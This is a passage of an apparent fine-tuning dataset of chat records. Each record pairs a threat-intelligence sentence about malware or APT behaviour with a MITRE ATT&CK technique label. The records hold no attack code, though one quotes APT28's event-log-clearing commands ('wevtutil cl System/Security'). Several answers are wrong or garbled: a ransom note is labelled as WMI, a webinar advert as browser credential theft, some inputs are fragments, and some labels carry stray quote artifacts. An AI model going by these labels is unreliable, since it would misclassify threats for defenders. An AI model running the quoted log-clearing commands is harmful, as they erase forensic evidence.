- "content": "A implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak encodes the message body of HTTP traffic with Base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can decode encrypted strings to enable execution of commands and payloads."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VALUEVAULT is a Golang compiled version of the “Windows Vault Password Dumper” browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel"
- },
- {
- "role": "assistant",
- "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used multiple software exploits for common client software, like Microsoft Word and Adobe Reader, to gain code execution as part of."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Drovorub can execute arbitrary commands as root on a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner harvested system resources to mine cryptocurrency, using XMRig to mine Monero."
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can be used to create SAML tokens using the AD Federated Services token signing certificate."
- },
- {
- "role": "assistant",
- "content": "T1606.002 - Forge Web Credentials: SAML token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell can launch port scans."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "supports file encryption (AES with the key \"lolomycin2017\")."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee has the ability to base64 encode C2 server responses."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT18 obfuscates strings in the payload."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications. Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government, with a mission that would benefit nation-state geopolitical and economic needs. APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts from trusted third parties, sometimes coupled with social engineering tactics. Register today to gain deeper insights into this threat group"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POORAIM can conduct file browsing."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32."
- },
- {
- "role": "assistant",
- "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has used a legitimately signed executable to execute a malicious payload within a DLL file."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Many of this APT’s components are signed with phony Intel and AMD digital certificates"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Credential Harvesting Attack On June 24, 2018, Unit 42 observed DarkHydrus carrying out a credential harvesting attack on an educational institution in the Middle East"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Dust Storm, the threat actors used a watering hole attack on a popular software reseller to exploit the then-zero-day Internet Explorer vulnerability CVE-2014-0322."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Note that the username could be a small joke on the attackers’ part regarding the attribution to FIN7"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor. The group has also moved laterally using the Local Administrator account."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has created web accounts including Dropbox and GitHub for C2 and document exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CaddyWiper can work alphabetically through drives on a compromised system to take ownership of and overwrite all files."
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has targeted victims with spearphishing emails containing malicious Microsoft Word documents."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StreamEx has the ability to enumerate system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has used a variety of open-source remote access Trojans for its operations."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "discovers information about the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After running within the %TEMP% path, Comnie will delete the original file"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MechaFlounder has been downloaded as a file named lsass.exe, which matches the legitimate Windows file."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use PowerSploit or other scripting frameworks to perform execution."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the executable file is executed, it will proceed to unzip a file named mdkhm.zip and then execute a Crimson RAT executable named dlrarhsiva.exe."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 can enumerate local and domain user account information."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WindTail can identify and add files that possess specific file extensions to an array for archiving."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used \"whoami\" to identify the local user and their privileges."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can perform keylogging."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Interestingly, we’ve seen recent samples embedding decoy documents that are screenshots of botnet C&C panels or dumps of credit card numbers"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempted to use RDP to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLACKCOFFEE uses Microsoft’s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims’ machines."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used the \"net share\" command as part of network reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has extensively used strategic web compromises to target victims."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stolen Pencil sent spearphishing emails containing links to domains controlled by the threat actor."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rancor has downloaded additional malware, including by using certutil."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the files are encrypted the program will write a ransom note to each folder and directory on the system called read_me_unlock.txt"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Afterwards, the persistence file will be created in /Library/LaunchDaemons/ or ~/Library/LaunchAgents/ folder"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories', 'T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can use Tasklist to collect a list of running tasks."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has obfuscated the wallet address in the payload binary."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "variants can use ports 443, 8443, and 8080 for communications."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "embedded a malicious macro in a Word document and lured the victim to click on an icon to execute the malware."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER may collect information on the victim's anti-virus software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can make small changes to itself in order to change its checksum and hash value."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has cleared event logs, including by using the commands \"wevtutil cl System\" and \"wevtutil cl Security\"."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection/decryption."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Protocol or Service Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has added batch scripts to the startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Imminent Monitor has a dynamic debugging feature to set the file attribute to hidden."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE has the ability to steal credentials from web browsers including Internet Explorer, Opera, Yandex, and Chrome."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3: FIN7 phishing lure persistence mechanisms Examining Attacker Shortcut Files In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The RDAT sample with the novel EWS C2 channel also had HTTP and DNS tunneling as C2 channels as well, which are very similar to other RDAT samples we collected. The HTTP C2 channel uses HTTP POST requests to transmit data to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has leveraged the BatchEncryption tool to perform advanced batch obfuscation and encoding techniques."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet occasionally takes a break from delivering malicious emails. Emotet's longest absence from the threat landscape occurred in early February 2020 and lasted more than five months. Emotet resumed operations in mid-July 2020, and it quickly surpassed other threats in sheer volume of malicious spam."
- },
- {
- "role": "assistant",
- "content": "T1098.002 - Account Manipulation: Additional Email Delegate Permissions', 'T1566 - Phishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The NOKKI malware itself has been updated in the short period of time it has been observed, moving from FTP to HTTP for C2 operations. The malware is modular in nature, and based on analysis of the information gathering module, it is highly likely the NOKKI operators are the same as the KONNI operators"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa can use Core Graphics Event Taps to intercept user keystrokes from any text input field and saves them to text files. Text input fields include Spotlight, Finder, Safari, Mail, Messages, and other apps that have text fields for passwords."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacSpy uses Tor for command and control."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has commands to enumerate all storage devices and to find all files that start with a particular string."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the Mac address, IP address, and the network adapter information from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Rclone \"chunker\" overlay supports splitting large files in smaller chunks during upload to circumvent size limits."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can establish a LNK file in the startup folder for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The technique of having a signed, legitimate, executable load a malicious library is commonly referred to as side-loading, and has been witnessed in a number of campaigns and malware families in the past"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has been decrypted before execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed has compressed collected data before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Catchamas gathers the Mac address, IP address, and the network adapter information from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
